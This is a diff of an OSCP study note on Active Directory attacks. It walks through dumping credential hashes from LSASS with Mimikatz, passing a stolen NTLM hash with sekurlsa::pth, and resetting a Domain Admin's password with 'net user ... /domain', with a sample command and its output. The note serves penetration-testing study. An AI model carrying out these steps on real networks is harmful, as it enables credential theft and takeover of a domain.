madslaz/Path-to-OSCP/Active-Directory.md

 * With local admin credentials, you'll be able to use Mimikatz to extract hashes (for example, from LSASS).
 As a quick recap, to do this, you need to run Mimikatz as an admin on your target and set debug privileges with `privilege::debug`.
 User sessions can then be dumped with `sekurlsa::logonpasswords`.
 Once you've stolen the password hash, you can now use it to authenticate using a pass-the-hash technique.

 ## Pass-the-Hash with Mimikatz
 * With your NTLM hash, you can use the `sekurlsa::pth` command in Mimikatz to spawn a new process with the provided username and hash, and the process will open with the user's privileges.
 So, if you've stolen a Domain Admin hash, you'll now be able to open processes as the Domain Admin.
-To do this, use the following Mimikatz command with the stolen hash:
+To do this, use the following Mimikatz command with the stolen hash.
+You'll need to provide the compromised user's username, the domain name, and the NTLM hash:
+  * This command will then spawn a new process (by default, cmd.exe), with the privileges of the provided user.
+  * With these new privileges, there are likely numerous ways to access the DC.
+One simple way is to change the plaintext password of the user whose NTLM password hash you've stolen to something of yoour choice.
+For example, you can change their password by running the following command: `net user Example-Admin password123! /domain`.
 ```
 sekurlsa::pth /user:<username> /domain:<Domain> /ntlm:<NTLM Hash>
+---
+mimikatz # sekurlsa::pth /user:Example-Admin /domain:example.com/ntlm:9BFEA4F8177A11F06B37957A55B13F70
+user    : Example-Admin
+domain  : example.com
+program : cmd.exe
+impers. : no
+NTLM    : 9BFEA4F8177A11F06B37957A55B13F70
+ |  PID  5728
+ |  TID  928
+ |  LSA Process is now R/W
+ |  LUID 0 ; 1358436 (00000000:0014ba64)
+ \_ msv1_0   - data copy @ 000002105DA0DA00 : OK !
+ \_ kerberos - data copy @ 000002105DA8B6C8
+  \_ des_cbc_md4       -> null
+  \_ des_cbc_md4       OK
+  \_ des_cbc_md4       OK
+  \_ des_cbc_md4       OK
+  \_ des_cbc_md4       OK
+  \_ des_cbc_md4       OK
+  \_ des_cbc_md4       OK
+  \_ *Password replace @ 000002105D3058F8 (32) -> null

 ```